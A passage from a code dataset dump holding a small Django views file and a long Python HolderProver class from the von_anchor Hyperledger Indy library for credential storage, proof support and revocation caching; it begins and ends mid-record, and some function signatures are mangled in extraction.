"usage_type": "call"}, {"api_name": "os.environ", "line_number": 14, "usage_type": "attribute"}, {"api_name": "subprocess.check_output", "line_number": 14, "usage_type": "call"}, {"api_name": "github.Github", "line_number": 20, "usage_type": "call"}, {"api_name": "semver.VersionInfo.parse", "line_number": 27, "usage_type": "call"}, {"api_name": "semver.VersionInfo", "line_number": 27, "usage_type": "attribute"}, {"api_name": "semver.VersionInfo.parse", "line_number": 33, "usage_type": "call"}, {"api_name": "semver.VersionInfo", "line_number": 33, "usage_type": "attribute"}, {"api_name": "semver.VersionInfo.parse", "line_number": 40, "usage_type": "call"}, {"api_name": "semver.VersionInfo", "line_number": 40, "usage_type": "attribute"}, {"api_name": "semver.VersionInfo.parse", "line_number": 46, "usage_type": "call"}, {"api_name": "semver.VersionInfo", "line_number": 46, "usage_type": "attribute"}, {"api_name": "typing.NamedTuple", 
"line_number": 49, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 51, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 54, "usage_type": "attribute"}, {"api_name": "typing.Any", "line_number": 54, "usage_type": "attribute"}, {"api_name": "subprocess.check_output", "line_number": 69, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 70, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 71, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 73, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 75, "usage_type": "call"}, {"api_name": "subprocess.check_call", "line_number": 85, "usage_type": "call"}, {"api_name": "subprocess.check_call", "line_number": 86, "usage_type": "call"}, {"api_name": "subprocess.check_call", "line_number": 87, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 89, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 97, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 112, "usage_type": "call"}, {"api_name": "os.uname", "line_number": 115, "usage_type": "call"}, {"api_name": "tempfile.NamedTemporaryFile", "line_number": 119, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 121, "usage_type": "call"}, {"api_name": "subprocess.check_call", "line_number": 122, "usage_type": "call"}, {"api_name": "configured_logger.logger.info", "line_number": 133, "usage_type": "call"}, {"api_name": "configured_logger.logger", "line_number": 133, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 134, "usage_type": "call"}, {"api_name": "typing.NamedTuple", "line_number": 144, "usage_type": "attribute"}, {"api_name": "os.getenv", "line_number": 157, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 162, "usage_type": "call"}, {"api_name": "os.uname", "line_number": 168, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 171, "usage_type": "call"}]}
+{"seq_id": "36762020096", "text": "from django.shortcuts import render, render_to_response\nfrom django.template import RequestContext\nfrom django.views.generic.base import TemplateView\n\nfrom braces.views import SetHeadlineMixin\n\nclass IndexView(SetHeadlineMixin, TemplateView):\n headline = 'Home Page'\n template_name = 'index.html'\n\n\ndef handler404(request):\n response = render_to_response('error/base.html', {'error_code': 404},\n context_instance=RequestContext(request))\n response.status_code = 404\n return response\n\n\ndef handler500(request):\n response = render_to_response('error/base.html', {'error_code': 500},\n context_instance=RequestContext(request))\n response.status_code = 500\n return response", "repo_name": "aaronlelevier/django-payasyougo", "sub_path": "payg/payg/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 706, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "braces.views.SetHeadlineMixin", "line_number": 7, "usage_type": "name"}, {"api_name": "django.views.generic.base.TemplateView", "line_number": 7, "usage_type": "name"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 13, "usage_type": "call"}, {"api_name": "django.template.RequestContext", "line_number": 14, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 20, "usage_type": "call"}, {"api_name": "django.template.RequestContext", "line_number": 21, "usage_type": "call"}]}
+{"seq_id": "25292478842", "text": "import json\nimport logging\n\nfrom os import listdir, makedirs\nfrom os.path import basename, expanduser, isdir, isfile, join\nfrom time import time\nfrom typing import Set, Union\n\nfrom indy import anoncreds, ledger\nfrom indy.error import IndyError, ErrorCode\nfrom von_anchor.anchor.base import _BaseAnchor\nfrom von_anchor.cache import Caches, RevoCacheEntry, CRED_DEF_CACHE, REVO_CACHE, SCHEMA_CACHE\nfrom von_anchor.codec import canon_wql\nfrom von_anchor.error import (\n AbsentCred,\n AbsentCredDef,\n AbsentInterval,\n AbsentLinkSecret,\n AbsentRevReg,\n AbsentSchema,\n AbsentTails,\n BadIdentifier,\n BadRevStateTime,\n CacheIndex,\n ClosedPool,\n CredentialFocus)\nfrom von_anchor.nodepool import NodePool\nfrom von_anchor.tails import Tails\nfrom von_anchor.util import (\n cred_def_id2seq_no,\n ok_cred_def_id,\n ok_rev_reg_id,\n ok_schema_id,\n prune_creds_json,\n rev_reg_id2cred_def_id_tag)\nfrom von_anchor.validate_config import validate_config\nfrom von_anchor.wallet import Wallet\n\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass HolderProver(_BaseAnchor):\n \"\"\"\n Mixin for anchor acting in the role of w3c Holder and indy-sdk Prover. A Holder holds\n credentials; a Prover produces proof of credentials. Revocation support requires\n the holder-prover anchor to manage tails files.\n \"\"\"\n\n def __init__(self, wallet: Wallet, pool: NodePool, cfg: dict = None) -> None:\n \"\"\"\n Initializer for HolderProver anchor. Retain input parameters; do not open wallet nor tails writer.\n\n :param wallet: wallet for anchor use\n :param pool: pool for anchor use\n :param cfg: configuration dict for cache archive behaviour; e.g.,\n\n ::\n\n {\n 'parse-cache-on-open': True\n 'archive-cache-on-close': True,\n }\n\n \"\"\"\n\n LOGGER.debug('HolderProver.__init__ >>> wallet: %s, pool: %s, cfg: %s', wallet, pool, cfg)\n\n super().__init__(wallet, pool)\n self._link_secret = None\n\n self._dir_tails = join(expanduser('~'), '.indy_client', 'tails')\n makedirs(self._dir_tails, exist_ok=True)\n\n self._cfg = cfg or {}\n validate_config('holder-prover', self._cfg)\n\n self._dir_cache = join(expanduser('~'), '.indy_client', 'cache', self.wallet.name)\n makedirs(self._dir_cache, exist_ok=True)\n\n LOGGER.debug('HolderProver.__init__ <<<')\n\n def _assert_link_secret(self, action: str):\n \"\"\"\n Raise AbsentLinkSecret if link secret is not set.\n\n :param action: action requiring link secret\n \"\"\"\n\n if self._link_secret is None:\n LOGGER.debug('HolderProver._assert_link_secret: action %s requires link secret but it is not set', action)\n raise AbsentLinkSecret('Action {} requires link secret but it is not set'.format(action))\n\n @property\n def cfg(self) -> dict:\n \"\"\"\n Accessor for configuration dict\n\n :return: holder-prover config dict\n \"\"\"\n\n return self._cfg\n\n @cfg.setter\n def cfg(self, value: dict) -> None:\n \"\"\"\n Set configuration dict\n\n :param value: configuration dict\n \"\"\"\n\n self._cfg = value or {}\n validate_config('holder-prover', self._cfg)\n\n @property\n def dir_cache(self) -> str:\n \"\"\"\n Accessor for cache archive directory\n\n :return: holder-prover cache archive directory\n \"\"\"\n\n return self._dir_cache\n\n async def _sync_revoc(self, rr_id: str) -> None:\n \"\"\"\n Pick up tails file reader handle for input revocation registry identifier. 
If no symbolic\n link is present, get the revocation registry definition to retrieve its tails file hash,\n then find the tails file and link it.\n\n Raise AbsentTails for missing corresponding tails file.\n\n :param rr_id: revocation registry identifier\n \"\"\"\n\n LOGGER.debug('HolderProver._sync_revoc >>> rr_id: %s', rr_id)\n\n if not ok_rev_reg_id(rr_id):\n LOGGER.debug('HolderProver._sync_revoc (str, int):\n \"\"\"\n Build rev reg delta json, potentially starting from existing (earlier) delta.\n\n Return delta json and its timestamp on the distributed ledger.\n\n Raise AbsentRevReg for no such revocation registry, or BadRevStateTime for a requested delta to\n a time preceding revocation registry creation.\n\n :param rr_id: rev reg id\n :param to: time (epoch seconds) of interest; upper-bounds returned timestamp\n :param fro: optional prior time of known delta json\n :param fro_delta: optional known delta as of time fro\n :return: rev reg delta json and ledger timestamp (epoch seconds)\n \"\"\"\n\n LOGGER.debug(\n '_HolderProver._build_rr_delta_json >>> rr_id: %s, to: %s, fro: %s, fro_delta: %s',\n rr_id,\n to,\n fro,\n fro_delta)\n\n if not ok_rev_reg_id(rr_id):\n LOGGER.debug('HolderProver._build_rr_delta_json str:\n \"\"\"\n Build and return indy-sdk requested credentials json from input indy-sdk creds structure\n through specified filter.\n\n :param creds: indy-sdk creds structure or list of cred-briefs (cred-info + interval)\n :param filt: filter mapping cred def ids to:\n - (optionally) 'attr-match': dict mapping attributes to values (omit, empty dict, or None to match all);\n - (optionally) 'minima': (pred) integer lower-bounds of interest (omit, empty dict, or None to match all);\n omit parameter or specify empty dict or None for no filter, matching all; e.g.,\n\n ::\n\n {\n 'Vx4E82R17q...:3:CL:16:0': {\n 'attr-match': {\n 'name': 'Alex',\n 'sex': 'M',\n 'favouriteDrink': None\n },\n 'minima': { # if both attr-match and minima present, combined conjunctively (i.e., via AND)\n 'favouriteNumber' : 10,\n 'score': 100 # if more than one minimum present, combined conjunctively (i.e., via AND)\n }\n },\n 'R17v42T4pk...:3:CL:19:0': {\n 'attr-match': {\n 'height': 175,\n 'birthdate': '1975-11-15' # combined conjunctively (i.e., via AND)\n }\n },\n 'Z9ccax812j...:3:CL:27:0': {\n 'attr-match': {} # match all attributes on this cred def\n },\n '9cHbp54C8n...:3:CL:37:0': {\n 'minima': { # request all attributes on this cred def, request preds specifying employees>=50\n 'employees' : 50,\n }\n }\n ...\n }\n\n :param filt_dflt_incl: whether to request (True) all creds by attribute/predicate\n that filter does not identify by cred def, or (False) to exclude them. 
Note that\n if the filter is None or {}, this parameter is unnecessary - it applies to a filter,\n not a non-filter.\n :return: indy_sdk requested_credentials json for use in proof creation\n \"\"\"\n\n LOGGER.debug('HolderProver.build_req_creds_json >>> creds: %s, filt: %s', creds, filt)\n\n req_creds = {\n 'self_attested_attributes': {},\n 'requested_attributes': {},\n 'requested_predicates': {}\n }\n\n def _add_brief(brief, uuid, req_creds_key):\n nonlocal req_creds\n req_creds[req_creds_key][uuid] = {\n 'cred_id': brief['cred_info']['referent'],\n 'revealed': True\n }\n if brief.get('interval', None):\n req_creds[req_creds_key][uuid]['timestamp'] = brief['interval']['to']\n if req_creds_key == 'requested_attributes':\n req_creds[req_creds_key][uuid]['revealed'] = True\n\n if filt:\n for cd_id in filt:\n if not ok_cred_def_id(cd_id):\n LOGGER.debug('HolderProver.build_req_creds_json str:\n \"\"\"\n Return path to the correct directory for the tails file on input revocation registry identifier.\n\n :param rr_id: revocation registry identifier of interest\n :return: path to tails dir for input revocation registry identifier\n \"\"\"\n\n LOGGER.debug('HolderProver.dir_tails >>>')\n\n if not ok_rev_reg_id(rr_id):\n LOGGER.debug('HolderProver.dir_tails 'HolderProver':\n \"\"\"\n Explicit entry. Perform ancestor opening operations,\n then parse cache from archive if so configured, and\n synchronize revocation registry to tails tree content.\n\n :return: current object\n \"\"\"\n\n LOGGER.debug('HolderProver.open >>>')\n\n await super().open()\n if self.cfg.get('parse-cache-on-open', False):\n Caches.parse(self.dir_cache)\n\n for path_rr_id in Tails.links(self._dir_tails):\n await self._sync_revoc(basename(path_rr_id))\n\n LOGGER.debug('HolderProver.open <<<')\n return self\n\n async def close(self) -> None:\n \"\"\"\n Explicit exit. If so configured, populate cache to prove all creds in\n wallet offline if need be, archive cache, and purge prior cache archives.\n\n :return: current object\n \"\"\"\n\n LOGGER.debug('HolderProver.close >>>')\n\n if self.cfg.get('archive-cache-on-close', False):\n await self.load_cache(True)\n Caches.purge_archives(self.dir_cache, True)\n\n await super().close()\n for path_rr_id in Tails.links(self._dir_tails):\n rr_id = basename(path_rr_id)\n try:\n await self._sync_revoc(rr_id)\n except ClosedPool:\n LOGGER.warning('HolderProver sync-revoc on close required ledger for %s but pool was closed', rr_id)\n\n LOGGER.debug('HolderProver.close <<<')\n\n async def rev_regs(self) -> list:\n \"\"\"\n Return list of revocation registry identifiers for which HolderProver has associated tails files.\n The operation creates associations for any (newly copied, via service wrapper API) tails files without.\n\n :return: list of revocation registry identifiers for which HolderProver has associated tails files\n \"\"\"\n\n LOGGER.debug('HolderProver.rev_regs >>>')\n\n for path_rr_id in Tails.links(self._dir_tails):\n await self._sync_revoc(basename(path_rr_id))\n\n rv = [basename(f) for f in Tails.links(self._dir_tails)]\n LOGGER.debug('HolderProver.rev_regs <<< %s', rv)\n return rv\n\n async def offline_intervals(self, cd_ids: list) -> dict:\n \"\"\"\n Return default non-revocation intervals for input cred def ids, based on content of revocation cache,\n for augmentation into specification for Verifier.build_proof_req_json. 
Note that the close() call\n to set the anchor off-line extends all revocation cache registry delta entries to its time of execution:\n in this case, the intervals will all be single timestamps rather than (to, fro) pairs.\n\n Raise CacheIndex if proof request cites credential definition without corresponding\n content in cred def cache or revocation cache.\n\n :param cd_ids: list of credential definition identifiers\n :return: dict mapping revocable cred def ids to interval specifications to augment into cd_id2spec\n parameter for Verifier.build_proof_req_json(), and non-revocable cred def ids to empty dict; e.g.,\n\n ::\n\n {\n 'Vx4E82R17q...:3:CL:16:0': {\n 'interval': (1528111730, 1528115832)\n },\n 'R17v42T4pk...:3:CL:19:0': {},\n 'Z9ccax812j...:3:CL:27:0': {\n 'interval': (1528112408, 1528116008)\n },\n '9cHbp54C8n...:3:CL:37:0': {\n 'interval': 1528116426\n },\n '6caBcmLi33...:3:CL:41:0': {},\n ...\n }\n \"\"\"\n\n LOGGER.debug('HolderProver.offline_intervals >>> cd_ids: %s', cd_ids)\n\n rv = {}\n for cd_id in cd_ids:\n if not ok_cred_def_id(cd_id):\n LOGGER.debug('HolderProver.offline_intervals None:\n \"\"\"\n Create link secret (a.k.a. master secret) used in proofs by HolderProver.\n\n Raise any IndyError causing failure to set link secret in wallet.\n\n :param link_secret: label for link secret; indy-sdk uses label to generate link secret\n \"\"\"\n\n LOGGER.debug('HolderProver.create_link_secret >>> link_secret: %s', link_secret)\n\n try:\n await anoncreds.prover_create_master_secret(self.wallet.handle, link_secret)\n except IndyError as x_indy:\n if x_indy.error_code == ErrorCode.AnoncredsMasterSecretDuplicateNameError:\n LOGGER.info('HolderProver did not create link secret - it already exists')\n else:\n LOGGER.debug(\n 'HolderProver.create_link_secret: (str, str):\n \"\"\"\n Create credential request as HolderProver and store in wallet; return credential json and metadata json.\n\n Raise AbsentLinkSecret if link secret not set.\n\n :param cred_offer_json: credential offer json\n :param cd_id: credential definition identifier\n :return: cred request json and corresponding metadata json as created and stored in wallet\n \"\"\"\n\n LOGGER.debug('HolderProver.create_cred_req >>> cred_offer_json: %s, cd_id: %s', cred_offer_json, cd_id)\n\n if not ok_cred_def_id(cd_id):\n LOGGER.debug('HolderProver.create_cred_req str:\n \"\"\"\n Store cred in wallet as HolderProver, return its credential identifier as created in wallet.\n\n Raise AbsentTails if tails file not available for revocation registry for input credential.\n\n :param cred_json: credential json as HolderProver created\n :param cred_req_metadata_json: credential request metadata as HolderProver created via create_cred_req()\n :return: credential identifier within wallet\n \"\"\"\n\n LOGGER.debug(\n 'HolderProver.store_cred >>> cred_json: %s, cred_req_metadata_json: %s',\n cred_json,\n cred_req_metadata_json)\n\n cred = json.loads(cred_json)\n cred_def_json = await self.get_cred_def(cred['cred_def_id'])\n rr_id = cred['rev_reg_id']\n rrdef_json = None\n if rr_id:\n await self._sync_revoc(rr_id)\n rrdef_json = await self._get_rev_reg_def(rr_id)\n\n rv = await anoncreds.prover_store_credential(\n self.wallet.handle,\n None, # cred_id, let indy-sdk generate random uuid\n cred_req_metadata_json,\n cred_json,\n cred_def_json,\n rrdef_json)\n\n LOGGER.debug('HolderProver.store_cred <<< %s', rv)\n return rv\n\n async def load_cache(self, archive: bool = False) -> int:\n \"\"\"\n Load caches and archive enough to go offline and be 
able to generate proof\n on all credentials in wallet.\n\n Return timestamp (epoch seconds) of cache load event, also used as subdirectory\n for cache archives.\n\n :return: cache load event timestamp (epoch seconds)\n \"\"\"\n\n LOGGER.debug('HolderProver.load_cache >>> archive: %s', archive)\n\n rv = int(time())\n box_ids = json.loads(await self.get_box_ids_json())\n for s_id in box_ids['schema_id']:\n with SCHEMA_CACHE.lock:\n await self.get_schema(s_id)\n for cd_id in box_ids['cred_def_id']:\n with CRED_DEF_CACHE.lock:\n await self.get_cred_def(cd_id)\n for rr_id in box_ids['rev_reg_id']:\n await self._get_rev_reg_def(rr_id)\n with REVO_CACHE.lock:\n revo_cache_entry = REVO_CACHE.get(rr_id, None)\n if revo_cache_entry:\n try:\n await revo_cache_entry.get_delta_json(self._build_rr_delta_json, rv, rv)\n except ClosedPool:\n LOGGER.warning(\n 'Holder-Prover %s is offline from pool %s, cannot update revo cache reg delta for %s to %s',\n self.wallet.name,\n self.pool.name,\n rr_id,\n rv)\n\n if archive:\n Caches.archive(self.dir_cache)\n LOGGER.debug('HolderProver.load_cache <<< %s', rv)\n return rv\n\n async def get_box_ids_json(self) -> str:\n \"\"\"\n Return json object on lists of all unique box identifiers for credentials in wallet, as\n evidenced by tails directory content:\n * schema identifiers\n * credential definition identifiers\n * revocation registry identifiers.\n\n E.g.,\n\n ::\n\n {\n \"schema_id\": [\n \"R17v42T4pk...:2:tombstone:1.2\",\n \"9cHbp54C8n...:2:business:2.0\",\n ...\n ],\n \"cred_def_id\": [\n \"R17v42T4pk...:3:CL:19:0\",\n \"9cHbp54C8n...:3:CL:37:0\",\n ...\n ]\n \"rev_reg_id\": [\n \"R17v42T4pk...:4:R17v42T4pk...:3:CL:19:0:CL_ACCUM:0\",\n \"R17v42T4pk...:4:R17v42T4pk...:3:CL:19:0:CL_ACCUM:1\",\n \"9cHbp54C8n...:4:9cHbp54C8n...:3:CL:37:0:CL_ACCUM:0\",\n \"9cHbp54C8n...:4:9cHbp54C8n...:3:CL:37:0:CL_ACCUM:1\",\n \"9cHbp54C8n...:4:9cHbp54C8n...:3:CL:37:0:CL_ACCUM:2\",\n ...\n ]\n }\n\n :return: tuple of sets for schema ids, cred def ids, rev reg ids\n \"\"\"\n\n LOGGER.debug('HolderProver.get_box_ids_json >>>')\n\n rr_ids = {basename(link) for link in Tails.links(self._dir_tails)}\n\n un_rr_ids = set()\n for rr_id in rr_ids:\n if not json.loads(await self.get_cred_infos_by_q(json.dumps({'rev_reg_id': rr_id}), 1)):\n un_rr_ids.add(rr_id)\n rr_ids -= un_rr_ids\n\n cd_ids = {cd_id for cd_id in listdir(self._dir_tails)\n if isdir(join(self._dir_tails, cd_id)) and ok_cred_def_id(cd_id)}\n s_ids = set()\n for cd_id in cd_ids:\n s_ids.add(json.loads(await self.get_schema(cred_def_id2seq_no(cd_id)))['id'])\n\n un_cd_ids = set()\n for cd_id in cd_ids:\n if not json.loads(await self.get_cred_infos_by_q(json.dumps({'cred_def_id': cd_id}), 1)):\n un_cd_ids.add(cd_id)\n cd_ids -= un_cd_ids\n\n un_s_ids = set()\n for s_id in s_ids:\n if not json.loads(await self.get_cred_infos_by_q(json.dumps({'schema_id': s_id}), 1)):\n un_s_ids.add(s_id)\n s_ids -= un_s_ids\n\n rv = json.dumps({\n 'schema_id': list(s_ids),\n 'cred_def_id': list(cd_ids),\n 'rev_reg_id': list(rr_ids)\n })\n LOGGER.debug('HolderProver.get_box_ids_json <<< %s', rv)\n return rv\n\n async def get_cred_infos_by_q(self, query_json: str, limit: int = None) -> str:\n \"\"\"\n Return list of cred-infos from wallet by input WQL query;\n return synopses of all credentials for no query.\n\n The operation supports a subset of WQL; i.e.,\n\n ::\n\n query = {subquery}\n subquery = {subquery, ..., subquery} - WHERE subquery AND ... AND subquery\n subquery = $or: [{subquery},..., {subquery}] - WHERE subquery OR ... 
OR subquery\n subquery = $not: {subquery} - Where NOT (subquery)\n subquery = \"tagName\": tagValue - WHERE tagName == tagValue\n subquery = \"tagName\": {$in: [tagValue, ..., tagValue]} - WHERE tagName IN (tagValue, ..., tagValue)\n subquery = \"tagName\": {$neq: tagValue} - WHERE tagName != tagValue\n\n but not\n\n ::\n\n subquery = \"tagName\": {$gt: tagValue} - WHERE tagName > tagValue\n subquery = \"tagName\": {$gte: tagValue} - WHERE tagName >= tagValue\n subquery = \"tagName\": {$lt: tagValue} - WHERE tagName < tagValue\n subquery = \"tagName\": {$lte: tagValue} - WHERE tagName <= tagValue\n subquery = \"tagName\": {$like: tagValue} - WHERE tagName LIKE tagValue\n\n :param query_json: WQL query json\n :param limit: maximum number of results to return\n\n :return: cred-infos as json list; i.e.,\n\n ::\n\n [\n {\n \"referent\": string, # credential identifier in the wallet\n \"attrs\": {\n \"attr1\" : {\"raw\": \"value1\", \"encoded\": \"value1_as_int\" },\n \"attr2\" : {\"raw\": \"value2\", \"encoded\": \"value2_as_int\" },\n ...\n }\n \"schema_id\": string,\n \"cred_def_id\": string,\n \"rev_reg_id\": Optional,\n \"cred_rev_id\": Optional\n },\n ...\n ]\n\n \"\"\"\n\n LOGGER.debug('HolderProver.get_cred_infos_by_query >>> query_json: %s, limit: %s', query_json, limit)\n\n infos = []\n if limit and limit < 0:\n limit = None\n\n (handle, cardinality) = await anoncreds.prover_search_credentials(\n self.wallet.handle,\n json.dumps(canon_wql(json.loads(query_json)))) # indy-sdk requires attr name canonicalization\n chunk = min(cardinality, limit or cardinality, Wallet.DEFAULT_CHUNK) # heuristic\n if limit:\n cardinality = min(limit, cardinality)\n try:\n while len(infos) != cardinality:\n batch = json.loads(await anoncreds.prover_fetch_credentials(handle, chunk))\n infos.extend(batch)\n if len(batch) < cardinality:\n break\n if len(infos) != cardinality:\n LOGGER.warning('Credential search/limit indicated %s results but fetched %s', cardinality, len(infos))\n finally:\n await anoncreds.prover_close_credentials_search(handle)\n\n rv_json = json.dumps(infos)\n LOGGER.debug('HolderProver.get_cred_infos_by_query <<< %s', rv_json)\n return rv_json\n\n async def get_cred_infos_by_filter(self, filt: dict = None) -> str:\n \"\"\"\n Return cred-info (list) from wallet by input filter for\n schema identifier and/or credential definition identifier components;\n return info of all credentials for no filter.\n\n :param filt: indy-sdk filter for credentials; i.e.,\n\n ::\n\n {\n \"schema_id\": string, # optional\n \"schema_issuer_did\": string, # optional\n \"schema_name\": string, # optional\n \"schema_version\": string, # optional\n \"issuer_did\": string, # optional\n \"cred_def_id\": string # optional\n }\n\n :return: credential infos as json list; i.e.,\n\n ::\n [\n {\n \"referent\": string, # credential identifier in the wallet\n \"attrs\": {\n \"attr1\" : {\"raw\": \"value1\", \"encoded\": \"value1_as_int\" },\n \"attr2\" : {\"raw\": \"value2\", \"encoded\": \"value2_as_int\" },\n ...\n }\n \"schema_id\": string,\n \"cred_def_id\": string,\n \"rev_reg_id\": Optional,\n \"cred_rev_id\": Optional\n },\n ...\n ]\n\n \"\"\"\n\n LOGGER.debug('HolderProver.get_cred_infos_by_filter >>> filt: %s', filt)\n\n rv_json = await anoncreds.prover_get_credentials(self.wallet.handle, json.dumps(filt or {}))\n LOGGER.debug('HolderProver.get_cred_infos_by_filter <<< %s', rv_json)\n return rv_json\n\n async def get_cred_info_by_id(self, cred_id: str) -> str:\n \"\"\"\n Return cred-info from wallet by wallet 
credential identifier.\n\n Raise AbsentCred for no such credential.\n\n :param cred_id: credential identifier of interest\n :return: json with cred for input credential identifier\n\n :return: cred-info json; i.e.,\n\n ::\n\n {\n \"referent\": string, # credential identifier in the wallet\n \"attrs\": {\n \"attr1\" : {\"raw\": \"value1\", \"encoded\": \"value1_as_int\" },\n \"attr2\" : {\"raw\": \"value2\", \"encoded\": \"value2_as_int\" },\n ...\n }\n \"schema_id\": string,\n \"cred_def_id\": string,\n \"rev_reg_id\": Optional,\n \"cred_rev_id\": Optional\n }\n \"\"\"\n\n LOGGER.debug('HolderProver.get_cred_info_by_id >>> cred_id: %s', cred_id)\n\n try:\n rv_json = await anoncreds.prover_get_credential(self.wallet.handle, cred_id)\n except IndyError as x_indy: # no such cred\n if x_indy.error_code == ErrorCode.WalletItemNotFound:\n LOGGER.debug(\n 'HolderProver.get_cred_info_by_id: (Set[str], str):\n \"\"\"\n Get credentials from HolderProver wallet corresponding to proof request and\n filter criteria; return credential identifiers from wallet and credentials json.\n Return empty set and empty production for no such credentials.\n\n This method is deprecated - prefer get_cred_briefs_by_proof_req_q() as it filters in-wallet.\n\n :param proof_req_json: proof request json as Verifier creates; has entries for proof request's\n nonce, name, and version; plus credential's requested attributes, requested predicates. I.e.,\n\n ::\n\n {\n 'nonce': string, # indy-sdk makes no semantic specification on this value\n 'name': string, # indy-sdk makes no semantic specification on this value\n 'version': numeric-string, # indy-sdk makes no semantic specification on this value\n 'requested_attributes': {\n '': { # aka attr_referent, a proof-request local identifier\n 'name': string, # attribute name (matches case- and space-insensitively)\n 'restrictions' [ # optional\n {\n \"schema_id\": string, # optional\n \"schema_issuer_did\": string, # optional\n \"schema_name\": string, # optional\n \"schema_version\": string, # optional\n \"issuer_did\": string, # optional\n \"cred_def_id\": string # optional\n },\n {\n ... # if more than one restriction given, combined disjunctively (i.e., via OR)\n }\n ],\n 'non_revoked': { # optional - indy-sdk ignores when getting creds from wallet\n 'from': int, # optional, epoch seconds\n 'to': int # optional, epoch seconds\n }\n },\n ...\n },\n 'requested_predicates': {\n '': { # aka predicate_referent, a proof-request local predicate identifier\n 'name': string, # attribute name (matches case- and space-insensitively)\n 'p_type': '>=',\n 'p_value': int, # predicate value\n 'restrictions': [ # optional\n {\n \"schema_id\": string, # optional\n \"schema_issuer_did\": string, # optional\n \"schema_name\": string, # optional\n \"schema_version\": string, # optional\n \"issuer_did\": string, # optional\n \"cred_def_id\": string # optional\n },\n {\n ... # if more than one restriction given, combined disjunctively (i.e., via OR)\n }\n ],\n 'non_revoked': { # optional - indy-sdk ignores when getting creds from wallet\n 'from': int, # optional, epoch seconds\n 'to': int # optional, epoch seconds\n }\n },\n ...\n },\n 'non_revoked': { # optional - indy-sdk ignores when getting creds from wallet\n 'from': Optional,\n 'to': Optional\n }\n }\n\n :param filt: filter for matching attribute-value pairs and predicates; dict mapping each\n cred def id to dict (specify empty dict or none for no filter, matching all)\n mapping attributes to values to match or compare. 
E.g.,\n\n ::\n\n {\n 'Vx4E82R17q...:3:CL:16:0': {\n 'attr-match': {\n 'name': 'Alex',\n 'sex': 'M',\n 'favouriteDrink': None\n },\n 'minima': { # if both attr-match and minima present, combined conjunctively (i.e., via AND)\n 'favouriteNumber' : 10,\n 'score': '100' # nicety: implementation converts to int for caller\n },\n },\n 'R17v42T4pk...:3:CL:19:0': {\n 'attr-match': {\n 'height': 175,\n 'birthdate': '1975-11-15' # combined conjunctively (i.e., via AND)\n }\n },\n 'Z9ccax812j...:3:CL:27:0': {\n 'attr-match': {} # match all attributes on this cred def\n }\n ...\n }\n\n :param filt_dflt_incl: whether to include (True) all credentials from wallet that filter does not\n identify by cred def, or to exclude (False) all such credentials\n :return: tuple with (set of referents, creds json for input proof request);\n empty set and empty production for no such credential\n \"\"\"\n\n LOGGER.debug('HolderProver.get_creds >>> proof_req_json: %s, filt: %s', proof_req_json, filt)\n\n if filt is None:\n filt = {}\n rv = None\n creds_json = await anoncreds.prover_get_credentials_for_proof_req(self.wallet.handle, proof_req_json)\n creds = json.loads(creds_json)\n cred_ids = set()\n\n if filt:\n for cd_id in filt:\n try:\n json.loads(await self.get_cred_def(cd_id))\n except AbsentCredDef:\n LOGGER.warning('HolderProver.get_creds: ignoring filter criterion, no cred def on %s', cd_id)\n filt.pop(cd_id)\n\n for briefs in {**creds['attrs'], **creds['predicates']}.values():\n for brief in briefs: # brief is a dict in a list of dicts\n cred_info = brief['cred_info']\n if filt:\n cred_cd_id = cred_info['cred_def_id']\n if cred_cd_id not in filt:\n if filt_dflt_incl:\n cred_ids.add(cred_info['referent'])\n continue\n if 'attr-match' in (filt[cred_cd_id] or {}): # maybe filt[cred_cd_id]: None\n if not {k: str(filt[cred_cd_id].get('attr-match', {})[k])\n for k in filt[cred_cd_id].get('attr-match', {})}.items() <= cred_info['attrs'].items():\n continue\n if 'minima' in (filt[cred_cd_id] or {}): # maybe filt[cred_cd_id]: None\n minima = filt[cred_cd_id].get('minima', {})\n try:\n if any((attr not in cred_info['attrs'])\n or (int(cred_info['attrs'][attr]) < int(minima[attr]))\n for attr in minima):\n continue\n except ValueError:\n continue # int conversion failed - reject candidate\n cred_ids.add(cred_info['referent'])\n else:\n cred_ids.add(cred_info['referent'])\n\n if filt:\n creds = json.loads(prune_creds_json(creds, cred_ids))\n\n rv = (cred_ids, json.dumps(creds))\n LOGGER.debug('HolderProver.get_creds <<< %s', rv)\n return rv\n\n async def get_cred_briefs_by_proof_req_q(\n self,\n proof_req_json: str,\n x_queries_json: str = None) -> (Set[str], str):\n \"\"\"\n Return cred-briefs from wallet by proof request and WQL queries by\n proof request referent. Return no cred-briefs no WQL query - util.proof_req2wql_all()\n builds WQL to retrieve all cred-briefs for some or all cred-def-ids in a proof request.\n\n For each WQL query on an item referent, indy-sdk takes the WQL and the attribute name\n and restrictions (e.g., cred def id, schema id, etc.) from its referent. 
